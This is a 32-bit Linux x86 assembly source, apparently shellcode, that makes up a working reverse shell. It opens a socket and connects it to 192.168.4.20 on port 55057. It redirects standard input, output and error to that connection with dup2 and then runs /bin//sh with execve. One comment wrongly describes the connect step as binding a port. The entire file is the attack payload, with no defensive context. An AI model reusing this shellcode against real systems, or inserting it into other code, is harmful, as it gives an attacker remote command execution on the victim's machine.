global _start

section .text

_start: 

	;STORING ARGUMENTS FOR SOCKETCALL SYSCALL
	
	XOR EAX, EAX
	MOV AL, 0X66
	XOR EBX, EBX
	MOV BL, 0X1

	;STORING ARGUMENTS FOR SOCKET FUNCTION CALL
	
	XOR EDX, EDX
	PUSH EDX
	PUSH BYTE 1
	PUSH BYTE 2
	
	;STORING ARGUMENTS FOR SOCKETCALL SYSCALL
	MOV ECX, ESP

	;EXECUTING SOCKETCALL SYSCALL

	INT 0X80
	MOV EDI, EAX ;STORING RETURN VALUE I.E. SOCKFD IN EDI


;STORING ARGUMENTS FOR SOCKETCALL SYSCALL
	
	XOR EAX, EAX
	MOV AL, 0X66
	XOR EBX, EBX
	MOV BL, 0X3
	
	;STORING SOCKADDR_N STRUCTURE ON STACK
	XOR EDX, EDX
	PUSH DWORD 0X1404A8C0
	PUSH WORD 0X11D7 ; PORT NUMBER TO BIND THE SHELL ON (present value connects on port 55057)
	PUSH WORD 0X02

	;STORING ARGUMENTS FOR BIND FUNCTION CALL
	MOV EDX, ESP
	PUSH BYTE 16
	PUSH EDX
	PUSH EDI

	;STORING ARGUMENTS FOR SOCKETCALL SYSCALL
	MOV ECX, ESP

	;EXECUTING SOCKETCALL SYSCALL

	INT 0X80

	XOR ECX, ECX
	XOR EAX, EAX
	MOV AL, 0X3F
	INT 0X80

	INC ECX
	XOR EAX, EAX
	MOV AL, 0X3F
	INT 0X80

	INC ECX
	XOR EAX, EAX
	MOV AL, 0X3F
	INT 0X80


	XOR EAX, EAX
	PUSH EAX
	PUSH 0X68732F2F
	PUSH 0X6E69622F
	MOV EBX, ESP
	MOV ECX, EAX
	MOV EDX, EAX
	MOV AL, 0XB
	INT 0X80
